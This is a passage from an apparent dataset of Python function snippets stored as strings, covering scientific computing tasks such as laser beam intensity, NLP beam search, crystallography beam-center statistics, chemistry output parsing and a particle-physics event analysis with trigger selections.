{}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def 
beam(xb,yb,zb,wx,wy,wavelen):\n\n zRx = np.pi * wx**2 / wavelen\n zRy = np.pi * wy**2 / wavelen \n \n sqrtX = np.sqrt( 1 + np.power(zb/zRx,2) ) \n sqrtY = np.sqrt( 1 + np.power(zb/zRy,2) ) \n intensity = np.exp( -2.*( np.power(xb/(wx*sqrtX ),2) \\\n + np.power(yb/(wy*sqrtY),2) )) / sqrtX / sqrtY\n return intensity", "def __analyze(self):\n\n\t\t'''\n\t\ttodo: bSlabList.analyze() needs to step through each edge, not slabs !!!\n\t\t'''\n\n\t\tfor edgeIdx, edge in enumerate(self.edgeDictList):\n\t\t\tlen2d = 0\n\t\t\tlen3d = 0\n\t\t\tlen3d_nathan = 0\n\n\t\t\tslabList = edge['slabList']\n\t\t\tfor j, slabIdx in enumerate(slabList):\n\n\t\t\t\tx1 = self.x[slabIdx]\n\t\t\t\ty1 = self.y[slabIdx]\n\t\t\t\tz1 = self.z[slabIdx]\n\n\t\t\t\t#print('pointIdx:', pointIdx)\n\t\t\t\torig_x = self.orig_x[slabIdx]\n\t\t\t\torig_y = self.orig_y[slabIdx]\n\t\t\t\torig_z = self.orig_z[slabIdx]\n\n\t\t\t\tif j>0:\n\t\t\t\t\tlen3d = len3d + self.euclideanDistance(prev_x1, prev_y1, prev_z1, x1, y1, z1)\n\t\t\t\t\tlen2d = len2d + self.euclideanDistance(prev_x1, prev_y1, None, x1, y1, None)\n\t\t\t\t\tlen3d_nathan = len3d_nathan + self.euclideanDistance(prev_orig_x1, prev_orig_y1, prev_orig_z1, orig_x, orig_y, orig_z)\n\n\t\t\t\t# increment\n\t\t\t\tprev_x1 = x1\n\t\t\t\tprev_y1 = y1\n\t\t\t\tprev_z1 = z1\n\n\t\t\t\tprev_orig_x1 = orig_x\n\t\t\t\tprev_orig_y1 = orig_y\n\t\t\t\tprev_orig_z1 = orig_z\n\n\t\t\tedge['Len 2D'] = round(len2d,2)\n\t\t\tedge['Len 3D'] = round(len3d,2)\n\t\t\tedge['Len 3D Nathan'] = round(len3d_nathan,2)\n\n\t\t\t# diameter, pyqt does not like to display np.float, cast to float()\n\t\t\tmeanDiameter = round(float(np.nanmean(self.d[edge['slabList']])),2)\n\t\t\tedge['Diam'] = meanDiameter", "def get_properties(self):\n assert self.kekulize, '#ERROR: u need to get explicit BOs for amon generation'\n self.vs = np.array([ ai.GetTotalValence() for ai in self.m0.GetAtoms() ], np.int)\n #self.update_bom()\n self.ias_heav = self.ias[ self.zs > 1 ]\n bom_heav = self.bom[ self.ias_heav, : ][ :, self.ias_heav ]\n self.vs_heav = bom_heav.sum(axis=0)\n self.cns_heav = ( bom_heav > 0 ).sum(axis=0)\n self.nhs = self.vs[:self.nheav] - self.vs_heav - self.chgs[:self.nheav]\n self.dvs = self.vs_heav - self.cns_heav\n self.hybs = np.array([ _hyb[ai.GetHybridization()] for ai in self.m.GetAtoms() ])", "def _beamstability_data(self):\n traces = unpack(self._bo + 'i', self.fh.read(4))[0]\n x = []\n data = []\n maxpoints = 0\n for _ in range(traces):\n points = unpack(self._bo + 'i', self.fh.read(4))[0]\n d = np.fromfile(self.fh, dtype=self._bo+'f8', count=2*points).reshape(2, points)\n data.append(d[1])\n if points > maxpoints:\n x = d[0]\n maxpoints = points\n\n for d in range(len(data)):\n pad_width = maxpoints - data[d].shape[0]\n data[d] = np.pad(data[d], (0, pad_width), 'constant')\n\n if self.header['file type'] == 31:\n if self.header['analysis type'].endswith('trolley step scan'):\n xprop = 'radius'\n xunit = 'mm'\n else:\n xprop = 'deflection'\n xunit = 'V'\n elif self.header['file type'] == 35:\n xprop = 'time'\n xunit = 's'\n\n self.data = xarray.DataArray(data, dims=('species', xprop),\n coords={\n 'species': ('species', list(self.header['label list'])),\n xprop: (xprop, x, {'unit': xunit})\n },\n attrs={\n 'unit': 'counts/s'\n })", "def read(self) :\n # Open the file.\n f = open(self.output, 'r')\n lines = f.readlines()\n \n # Find the eigenvalue.\n count = 0\n while True :\n words = lines[count].split()\n if len(words) == 5 :\n if words[0] == \"*\" and words[1] == \"K-EFF\":\n self.keff = 
float(words[3])\n break\n count += 1\n \n # Find the peaking.\n a = 0 # Assembly index\n \n while True :\n words = lines[count].split()\n if len(words) == 8 :\n if words[0] == \"NODE\" and words[1] == \"AVERAGE\" and words[2] == \"POWERS\" :\n count += 5 # Powers start 5 lines below title\n for row in range(0, self.dimension) :\n words = lines[count].split()\n assert(len(words) >= self.dimension)\n for col in range(0, self.dimension) :\n self.peaking_map[row, col] = float(words[col+1])\n if self.core.stencil[row, col] > 0:\n #print \" a=\", a, \" row=\", row, \" col=\", col, len(self.peaking)\n self.peaking[a] = self.peaking_map[row, col]\n a += 1\n count += 1\n break\n count += 1 \n # Maximum peaking.\n self.maxpeak = np.max(self.peaking)", "def calculate_beam_xy(self):\n info = []\n\n # Import relevant info\n pixel_size = self.info.pixel_size\n for i in [j.final for j in self.final_objects]:\n try:\n info.append(\n [\n i,\n i[\"beamX\"],\n i[\"beamY\"],\n i[\"wavelength\"],\n i[\"distance\"],\n (i[\"a\"], i[\"b\"], i[\"c\"], i[\"alpha\"], i[\"beta\"], i[\"gamma\"]),\n ]\n )\n except IOError as e:\n print(\"IOTA ANALYSIS ERROR: BEAMXY failed! \", e)\n pass\n\n # Calculate beam center coordinates and distances\n beamX = [i[1] for i in info]\n beamY = [j[2] for j in info]\n beam_dist = [\n math.hypot(i[1] - np.median(beamX), i[2] - np.median(beamY)) for i in info\n ]\n beam_dist_std = np.std(beam_dist)\n img_list = [\n [i[0], i[1], i[2], i[3], i[4], i[5], j]\n for i, j in list(zip(info, beam_dist))\n ]\n\n # Separate out outliers\n outliers = [i for i in img_list if i[3] > 2 * beam_dist_std]\n clean = [i for i in img_list if i[3] <= 2 * beam_dist_std]\n cbeamX = [i[1] for i in clean]\n cbeamY = [j[2] for j in clean]\n obeamX = [i[1] for i in outliers]\n obeamY = [j[2] for j in outliers]\n\n # Calculate median wavelength, detector distance and unit cell params from\n # non-outliers only\n wavelengths = [i[3] for i in clean]\n distances = [i[4] for i in clean]\n cells = [i[5] for i in clean]\n\n wavelength = np.median(wavelengths)\n det_distance = np.median(distances)\n a = np.median([i[0] for i in cells])\n b = np.median([i[1] for i in cells])\n c = np.median([i[2] for i in cells])\n\n # Calculate predicted L +/- 1 misindexing distance for each cell edge\n aD = det_distance * math.tan(2 * math.asin(wavelength / (2 * a)))\n bD = det_distance * math.tan(2 * math.asin(wavelength / (2 * b)))\n cD = det_distance * math.tan(2 * math.asin(wavelength / (2 * c)))\n\n return (\n beamX,\n beamY,\n cbeamX,\n cbeamY,\n obeamX,\n obeamY,\n beam_dist,\n [i[4] for i in info],\n aD,\n bD,\n cD,\n pixel_size,\n )", "def beam_filter(self, ouput_token_step):\n idx_array = np.argpartition(ouput_token_step[0, -1, :], -self.beam_width)[-self.beam_width:] #index for reverse_target_word\n prob_array = np.log(np.partition(ouput_token_step[0, -1, :], -self.beam_width)[-self.beam_width:])\n \n return idx_array, prob_array", "def test_set_ps(self):\n s = State(substance=\"water\")\n s.ps = Q_(101325.0, \"Pa\"), Q_(3028.9867985920914, \"J/(kg*K)\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[0], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[1], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250.0, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert 
np.isclose(s.v, Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore\n s.ps = Q_(101325.0, \"Pa\"), Q_(8623.283568815832, \"J/(kg*K)\")\n assert np.isclose(s.T, Q_(700.9882316847855, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[0], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.ps[1], Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.u, Q_(3013250.0, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(3.189303132125469, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(3336406.139862406, \"J/kg\")) # type: ignore\n assert s.x is None", "def get_SAs(self):\n\n self.r_max_SA = 0\n self.p_max_SA = 0\n self.delta_SA = 0\n for m in self.components:\n prop_dict = m.read_prop_file()\n\n # Ignore compounds that are common solvents or salts.\n # if m.name not in KEGG_IDs_to_ignore():\n if m.role == 'reactant':\n self.r_max_SA = max([\n self.r_max_SA,\n prop_dict['Synth_score']\n ])\n elif m.role == 'product':\n self.p_max_SA = max([\n self.p_max_SA,\n prop_dict['Synth_score']\n ])\n\n self.delta_SA = self.p_max_SA - self.r_max_SA", "def translate_beam_search(source_sentence: List[int], model: Seq2SeqAttentionModel,\n beam_width: int, max_length=10) -> Tuple[List[int], float]:\n encoder_hiddens = encode_all(source_sentence, model)\n beam_elems = []\n # stack x hid_dim\n prev_hidden = encoder_hiddens[-1]\n prev_context = torch.zeros(model.hidden_dim)\n\n beam_elems= [([SOS_token], float(0), prev_hidden, prev_context)]\n candidate_translations = []\n available_width = beam_width\n\n for i in range(max_length):\n if available_width >0:\n candidate_beam_elems = []\n for b in range(len(beam_elems)):\n prev_predict, prev_log_prob, prev_hidden, prev_context = beam_elems[b]\n probs, prev_hidden, prev_context, _ = decode(prev_hidden, encoder_hiddens, prev_context,\n prev_predict[-1], model)\n log_probs = torch.log(probs)\n top_log_probs, top_preds = torch.topk(log_probs,available_width)\n for k in range(len(top_log_probs)):\n curr_log_prob = prev_log_prob + top_log_probs[k].item()\n curr_pred_list = prev_predict + [top_preds[k].item()]\n candidate = (curr_pred_list, curr_log_prob, prev_hidden, prev_context)\n candidate_pos = -1\n for pos in range(len(candidate_beam_elems)):\n if curr_log_prob > candidate_beam_elems[pos][1]:\n candidate_pos = pos\n if not candidate_pos == -1:\n candidate_beam_elems.insert(candidate_pos+1, candidate)\n elif len(candidate_beam_elems) < available_width:\n candidate_beam_elems.append(candidate)\n if len(candidate_beam_elems) > available_width:\n candidate_beam_elems.pop()\n\n beam_elems = []\n for candidate in candidate_beam_elems:\n if candidate[0][-1] == EOS_token or i==(max_length-1):\n candidate_translations.append(candidate)\n available_width -= 1\n else:\n beam_elems.append(candidate)\n\n max_prob = -math.inf\n best_elem = -1\n for pos in range(len(candidate_translations)):\n norm_prob = candidate_translations[pos][1]/len(candidate_translations[pos][0])\n if norm_prob > max_prob:\n max_prob = norm_prob\n best_elem = pos\n\n # remove SOS token from the beginning\n del candidate_translations[best_elem][0][0]\n\n return candidate_translations[best_elem][0], candidate_translations[best_elem][1]", "def cal_Beam_TheoRMS(n_ant, tobs, 
chan_width, sbid):\n \n BEAM_T_RMS = []\n\n coreff = 0.8 # correlator efficiency\n npol = 2.0 # Number of polarisation, npol = 2 for images in Stokes I, Q, U, or V\n\n obj = bf.load_beamset_class('SEFD_{}.hdf5'.format(sbid))\n freq = obj.frequencies\n data = obj.data #[time, antenna, beam, polarisation, channel, payload]\n pol_XX = 0 # polarisation 0 - 3 (XX,XY,YX,YY)\n pol_YY = 3\n \n for beam in range(36):\n med_XX_SEFD = np.median(data[0, :, beam, pol_XX, :, 0]) #use all available antennas\n med_YY_SEFD = np.median(data[0, :, beam, pol_YY, :, 0]) \n med_SEFD = 0.5*math.sqrt(med_XX_SEFD**2.0 + med_YY_SEFD**2.0) # SEFD of stokes I\n t_rms_mjy = 1000.*(med_SEFD/(coreff*math.sqrt(npol*n_ant*(n_ant-1)*chan_width*tobs)))\n BEAM_T_RMS.append(t_rms_mjy)\n\n return BEAM_T_RMS", "def s_pos(self):\n running_total = 0\n for i in range(self.prob.num):\n if self.alphas[i] > 1e-5 > self.prob.C - self.deltas[i] and self.prob.Y[i] == 1:\n ayxx = 0\n for j in range(self.prob.num):\n ayxx += self.alphas[j] * self.prob.Y[j] * self.prob.xkernel(self.prob.X[j], self.prob.X[i])\n running_total += 1 - ayxx\n return running_total", "def score(self, beam, logprobs):\n l_term = (((5 + len(beam.next_ys)) ** self.alpha) /\n ((5 + 1) ** self.alpha))\n return (logprobs / l_term)", "def read_properties_sp(lines):\n\n # TODO Better logging for crashed xtb\n if not read_status(lines):\n return None\n\n keywords = [\n \"final structure:\",\n \":: SUMMARY ::\",\n \"Property Printout \",\n \"ITERATIONS\",\n ]\n\n stoppattern = \"CYCLE \"\n idxs = linesio.get_rev_indices_patterns(lines, keywords, stoppattern=stoppattern)\n idxs[0]\n idx_summary = idxs[1]\n idx_end_summary = idxs[2]\n idxs[3]\n\n if idx_summary is None:\n # TODO Better fix\n assert False, \"uncaught xtb exception\"\n\n # Get atom count\n keyword = \"number of atoms\"\n idx = linesio.get_index(lines, keyword)\n line = lines[idx]\n n_atoms = line.split()[-1]\n n_atoms = int(n_atoms)\n\n # Get energies\n idx_summary = idxs[1] + 1\n\n # :: total energy +1\n # :: total w/o Gsasa/hb +2\n # :: gradient norm +3\n # :: HOMO-LUMO gap +4\n # ::.....................+4\n # :: SCC energy +5\n # :: -> isotropic ES +6\n # :: -> anisotropic ES +7\n # :: -> anisotropic XC +8\n # :: -> dispersion +9\n # :: -> Gsolv +10\n # :: -> Gborn +11\n # :: -> Gsasa +12\n # :: -> Ghb +13\n # :: -> Gshift +14\n # :: repulsion energy +15\n # :: add. 
restraining +16\n\n prop_lines = lines[idx_summary : idx_end_summary - 2]\n prop_dict = parse_sum_table(prop_lines)\n\n # total_energy = prop_dict.get(\"total_energy\", float(\"nan\"))\n # gsolv = prop_dict.get(\"gsolv\", float(\"nan\"))\n # electronic_energy = prop_dict.get(\"scc_energy\", float(\"nan\"))\n\n properties = prop_dict\n\n # Get dipole\n dipole_str = \"molecular dipole:\"\n idx = linesio.get_rev_index(lines, dipole_str)\n if idx is None:\n dipole_tot = None\n else:\n idx += 3\n line = lines[idx]\n line = line.split()\n dipole_tot = line[-1]\n dipole_tot = float(dipole_tot)\n\n properties = {\n COLUMN_DIPOLE: dipole_tot,\n **properties,\n }\n\n # Get covalent properties\n properties_covalent = read_covalent_coordination(lines)\n\n # Get orbitals\n properties_orbitals = read_properties_orbitals(lines)\n properties = {**properties, **properties_orbitals, **properties_covalent}\n\n return properties", "def analyze(self, event):\n\n event = mappedEvent(event, mapname=self._branch_map)\n\n values = []\n ev = event.event\n\n values.append(self.GetValue(event, \"Lepton_pt[0]\") * math.cos(self.GetValue(event, \"Lepton_phi[0]\")))\n values.append(self.GetValue(event, \"Lepton_pt[0]\") * math.sin(self.GetValue(event, \"Lepton_phi[0]\")))\n values.append(self.GetValue(event, \"Lepton_pt[0]\") * math.sinh(self.GetValue(event, \"Lepton_eta[0]\")))\n values.append(self.GetValue(event, \"Lepton_pt[1]\") * math.cos(self.GetValue(event, \"Lepton_phi[1]\")))\n values.append(self.GetValue(event, \"Lepton_pt[1]\") * math.sin(self.GetValue(event, \"Lepton_phi[1]\")))\n values.append(self.GetValue(event, \"Lepton_pt[1]\") * math.sinh(self.GetValue(event, \"Lepton_eta[1]\")))\n\n if self.GetValue(event, \"nCleanJet\")>=1:\n values.append(self.GetValue(event, \"CleanJet_pt[0]\") * math.cos(self.GetValue(event, \"CleanJet_phi[0]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[0]\") * math.sin(self.GetValue(event, \"CleanJet_phi[0]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[0]\") * math.sinh(self.GetValue(event, \"CleanJet_eta[0]\")))\n else:\n values.append(0.0)\n values.append(0.0)\n values.append(0.0)\n if self.GetValue(event, \"nCleanJet\")>=2:\n values.append(self.GetValue(event, \"CleanJet_pt[1]\") * math.cos(self.GetValue(event, \"CleanJet_phi[1]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[1]\") * math.sin(self.GetValue(event, \"CleanJet_phi[1]\")))\n values.append(self.GetValue(event, \"CleanJet_pt[1]\") * math.sinh(self.GetValue(event, \"CleanJet_eta[1]\")))\n else:\n values.append(0.0)\n values.append(0.0)\n values.append(0.0)\n\n values.append(self.GetValue(event, \"PuppiMET_pt\") * math.cos(self.GetValue(event, \"PuppiMET_phi\")))\n values.append(self.GetValue(event, \"PuppiMET_pt\") * math.sin(self.GetValue(event, \"PuppiMET_phi\")))\n values.append(self.GetValue(event, \"dphilmet1\"))\n values.append(self.GetValue(event, \"dphilmet2\"))\n values.append(self.GetValue(event, \"mll\"))\n values.append(self.GetValue(event, \"mTi\"))\n values.append(self.GetValue(event, \"mth\"))\n values.append(self.GetValue(event, \"mtw1\"))\n values.append(self.GetValue(event, \"mtw2\"))\n values.append(self.GetValue(event, \"ht\"))\n values.append(self.GetValue(event, \"vht_pt\") * math.cos(self.GetValue(event, \"vht_phi\")))\n values.append(self.GetValue(event, \"vht_pt\") * math.sin(self.GetValue(event, \"vht_phi\")))\n\n\n values_stacked = np.hstack(values).reshape(1, len(values))\n values_preprocessed = self.preprocessing[ev % 2].transform(values_stacked)\n response = 
self.classifiers[ev % 2].predict(values_preprocessed)\n response = np.squeeze(response)\n\n self.out.fillBranch(\"DNN_mth\", response)\n\n return True", "def calculate(self):\n\n gt = self.ground_truth.flatten()\n seg = self.segmentation.flatten()\n\n n = gt.size\n mean_gt = gt.mean()\n mean_seg = seg.mean()\n mean = (mean_gt + mean_seg) / 2\n\n m = (gt + seg) / 2\n ssw = np.power(gt - m, 2).sum() + np.power(seg - m, 2).sum()\n ssb = np.power(m - mean, 2).sum()\n\n ssw /= n\n ssb = ssb / (n - 1) * 2\n\n return (ssb - ssw) / (ssb + ssw)", "def analyze(self, event):\n ##### set variables ####\n self.nElectrons = 0\n self.nMuons = 0\n self.nTaus = 0\n self.nFatJets = 0\n self.EventWeight = 1.\n self.TopWeight = 1.\n self.BTagAK8Weight = 1.\n self.BTagAK4Weight = 1.\n self.BTagAK8Weight_deep = 1.\n self.BTagAK8Weight_deep_up = 1.\n self.BTagAK8Weight_deep_down = 1.\n self.BTagAK4Weight_deep = 1.\n self.BTagAK4Weight_deep_up = 1.\n self.BTagAK4Weight_deep_down = 1.\n self.BBTagWeight = 1.\n self.GenWeight = 1.\n self.PUWeight = 1.\n self.LeptonWeight = 1.\n self.LeptonWeightUp = 1.\n self.LeptonWeightDown = 1.\n self.TriggerWeight = 1.\n self.TriggerWeightUp = 1.\n self.TriggerWeightDown = 1.\n self.isZtoMM = False\n self.isZtoEE = False\n self.isZtoNN = False\n self.isTtoEM = False\n self.isBoosted4B = False\n self.isHtobb = False\n self.isHtobb_ml = False\n self.isMaxBTag_loose = False\n self.isMaxBTag_medium = False\n self.isMaxBTag_tight = False\n self.isVBF = False\n self.is2016 = False\n self.is2017 = False\n self.is2018 = False\n self.nTaus = 0\n self.nJetsNoFatJet = 0\n self.H_partonflavour = -1.\n self.H_hadronflavour = -1.\n self.DPhi = -1.\n self.VHDEta = -1.\n self.MinJetMetDPhi = 10.\n self.MaxJetNoFatJetBTag = -1.\n self.BtagDeepB = -1.\n self.DeepTagMD_H4qvsQCD = -1.\n self.DeepTagMD_HbbvsQCD = -1.\n self.DeepTagMD_ZHbbvsQCD = -1.\n self.DeepTagMD_ZbbvsQCD = -1.\n self.DeepTagMD_bbvsLight = -1.\n self.DeepTagMD_WvsQCD = -1.\n self.DeepTagMD_ZvsQCD = -1.\n self.Mu1_pt = -1.\n self.Mu1_eta = -1.\n self.Mu1_phi = -1.\n self.Mu1_mass = -1.\n self.Mu1_pfIsoId = -1.\n self.Mu1_relIso = -1.\n self.Mu1_highPtId = -1.\n self.Mu2_pt = -1.\n self.Mu2_eta = -1.\n self.Mu2_phi = -1.\n self.Mu2_mass = -1.\n self.Mu2_pfIsoId = -1.\n self.Mu2_relIso = -1.\n self.Mu2_highPtId = -1.\n self.Ele1_pt = -1.\n self.Ele1_eta = -1.\n self.Ele1_phi = -1.\n self.Ele1_mass = -1.\n self.Ele2_pt = -1.\n self.Ele2_eta = -1.\n self.Ele2_phi = -1.\n self.Ele2_mass = -1.\n self.Ele_HEM15_16 = -1.\n self.HT_HEM15_16 = -1.\n self.HT = 0.\n self.LHEScaleWeight = -1.\n self.LHEPdfWeight = -1.\n self.LHEWeight_originalXWGTUP = -1.\n self.PrefireWeight = 1.\n self.PrefireWeightUp = 1.\n self.PrefireWeightDown = 1.\n self.QCDNLO_Corr = 1.\n self.QCDNNLO_Corr = 1.\n self.EWKNLO_Corr = 1.\n self.Jet1_VBF_pt = -1.\n self.Jet1_VBF_eta = -1.\n self.Jet1_VBF_phi = -1.\n self.Jet1_VBF_mass = -1.\n self.Jet2_VBF_pt = -1.\n self.Jet2_VBF_eta = -1.\n self.Jet2_VBF_phi = -1.\n self.Jet2_VBF_mass = -1.\n self.dijet_VBF_mass = -1.\n self.deltaR_VBF = -1.\n self.deltaR_HVBFjet1 = -1.\n self.deltaR_HVBFjet2 = -1.\n self.H_pt = -1.\n self.H_eta = -1.\n self.H_phi = -1.\n self.H_mass = -1.\n self.H_M = -1.\n self.H_tau21 = -1.\n self.H_tau41 = -1.\n self.H_tau42 = -1.\n self.H_tau31 = -1.\n self.H_tau32 = -1.\n self.H_ddt = -1.\n self.H_csv1 = -1.\n self.H_csv2 = -1.\n self.H_deepcsv1 = -1.\n self.H_deepcsv2 = -1.\n self.H_dbt = -1.\n self.H_chf = -1.\n self.H_nhf = -1.\n self.V_pt = -1.\n self.V_eta = -1.\n self.V_phi = -1.\n 
self.V_mass = -1.\n self.VH_deltaR = -1.\n self.X_pt = -1.\n self.X_eta = -1.\n self.X_phi = -1.\n self.X_mass = -1.\n self.X_mass_chs = -1.\n self.X_mass_nom = -1.\n self.X_mass_jesUp = -1.\n self.X_mass_jesDown = -1.\n self.X_mass_jerUp = -1.\n self.X_mass_jerDown = -1.\n self.X_mass_MET_nom = -1.\n self.X_mass_MET_jesUp = -1.\n self.X_mass_MET_jesDown = -1.\n self.X_mass_MET_jerUp = -1.\n self.X_mass_MET_jerDown = -1.\n self.H_mass_nom = -1.\n self.H_mass_jmsUp = -1.\n self.H_mass_jmsDown = -1.\n self.H_mass_jmrUp = -1.\n self.H_mass_jmrDown = -1.\n\n \n \n eecutflow_list = []\n mmcutflow_list = []\n nncutflow_list = []\n\n idx_electrons = []\n idx_loose_electrons = []\n idx_muons = []\n idx_loose_muons = []\n idx_fatjet = []\n idx_jet = []\n idx_jet_vbf = []\n\n electrons_tlv_list = []\n loose_electrons_tlv_list = []\n muons_tlv_list = []\n loose_muons_tlv_list = []\n fatjet_tlv_list = []\n jet_tlv_list = []\n jet_tlv_list_vbf = []\n fatjet_tau21_list = []\n fatjet_tau41_list = []\n fatjet_tau42_list = []\n fatjet_tau31_list = []\n fatjet_tau32_list = []\n\n V = ROOT.TLorentzVector()\n H = ROOT.TLorentzVector()\n X = ROOT.TLorentzVector()\n\n V_chs = ROOT.TLorentzVector()\n ######### cuts #########\n elec1_pt_cut = 55.\n elec2_pt_cut = 20.\n elec_pt_cut = 10.\n elec_eta_cut = 2.5\n muon1_pt_cut = 55.\n muon2_pt_cut = 20. \n muon_pt_cut = 10.\n muon_eta_cut = 2.4\n tau_pt_cut = 18.\n tau_eta_cut = 2.3\n ak4_pt_cut = 30.\n ak4_eta_cut = 2.4\n fatjet_pt_cut = 200.\n fatjet_eta_cut = 2.4\n met_pt_cut = 250.\n v_pt_cut = 200.\n tau21_lowercut = 0.35\n tau21_uppercut = 0.75\n j_mass_lowercut = 30.\n j_mass_uppercut = 250.\n v_mass_lowercut = 65.\n v_mass_intercut = 85.\n v_mass_uppercut = 105.\n h_mass_lowercut = 105.\n h_mass_uppercut = 135.\n x_mass_lowercut = 750.\n xt_mass_lowercut = 650.\n xjj_mass_lowercut = 950.\n \n #### flag for year #######\n if self.year == 2016:\n self.is2016 = True\n elif self.year == 2017:\n self.is2017 = True\n elif self.year == 2018:\n self.is2018 = True\n \n \n ######### triggers #########\n if self.year == 2016:\n try:\n trigger_SingleMu = any([event.HLT_Mu50,\n event.HLT_TkMu50])\n except:\n trigger_SingleMu = event.HLT_Mu50\n trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT\n trigger_SingleIsoEle = event.HLT_Ele27_WPTight_Gsf\n trigger_SinglePhoton = event.HLT_Photon175\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight, \n event.HLT_PFMET120_PFMHT120_IDTight])\n trigger_MET = any([event.HLT_PFMET170_NotCleaned,\n event.HLT_PFMET170_HBHECleaned])\n elif self.year == 2017:\n try:\n trigger_SingleMu = any([event.HLT_Mu50,\n event.HLT_TkMu100,\n event.HLT_OldMu100])\n except:\n trigger_SingleMu = event.HLT_Mu50\n try:\n trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT\n except:\n trigger_SingleEle = None\n trigger_SingleIsoEle = event.HLT_Ele35_WPTight_Gsf\n trigger_SinglePhoton = event.HLT_Photon200\n try:\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,\n event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,\n event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n except:\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n 
event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight, \n event.HLT_PFMET120_PFMHT120_IDTight,\n event.HLT_PFMET130_PFMHT130_IDTight, \n event.HLT_PFMET140_PFMHT140_IDTight,\n event.HLT_PFMETTypeOne110_PFMHT110_IDTight,\n event.HLT_PFMETTypeOne120_PFMHT120_IDTight,\n event.HLT_PFMETTypeOne130_PFMHT130_IDTight,\n event.HLT_PFMETTypeOne140_PFMHT140_IDTight])\n try:\n trigger_MET = any([event.HLT_PFMET200_NotCleaned,\n event.HLT_PFMET200_HBHECleaned,\n event.HLT_PFMET200_HBHE_BeamHaloCleaned,\n event.HLT_PFMET250_HBHECleaned])\n except:\n trigger_MET = None\n\n elif self.year == 2018:\n trigger_SingleMu = any([event.HLT_Mu50,\n event.HLT_TkMu100,\n event.HLT_OldMu100])\n trigger_SingleEle = event.HLT_Ele115_CaloIdVT_GsfTrkIdT\n trigger_SingleIsoEle = event.HLT_Ele32_WPTight_Gsf\n trigger_SinglePhoton = event.HLT_Photon200\n trigger_METMHTNoMu = any([event.HLT_PFMETNoMu110_PFMHTNoMu110_IDTight,\n event.HLT_PFMETNoMu120_PFMHTNoMu120_IDTight,\n event.HLT_PFMETNoMu130_PFMHTNoMu130_IDTight,\n event.HLT_PFMETNoMu140_PFMHTNoMu140_IDTight,\n event.HLT_MonoCentralPFJet80_PFMETNoMu120_PFMHTNoMu120_IDTight])\n trigger_METMHT = any([event.HLT_PFMET110_PFMHT110_IDTight, \n event.HLT_PFMET120_PFMHT120_IDTight,\n event.HLT_PFMET130_PFMHT130_IDTight, \n event.HLT_PFMET140_PFMHT140_IDTight,\n event.HLT_PFMETTypeOne110_PFMHT110_IDTight,\n event.HLT_PFMETTypeOne120_PFMHT120_IDTight,\n event.HLT_PFMETTypeOne130_PFMHT130_IDTight,\n event.HLT_PFMETTypeOne140_PFMHT140_IDTight])\n trigger_MET = any([event.HLT_PFMET200_NotCleaned,\n event.HLT_PFMET200_HBHECleaned,\n event.HLT_PFMET200_HBHE_BeamHaloCleaned,\n event.HLT_PFMET250_HBHECleaned])\n ########## Gen Weight #########\n if self.isMC:\n self.GenWeight = -1. 
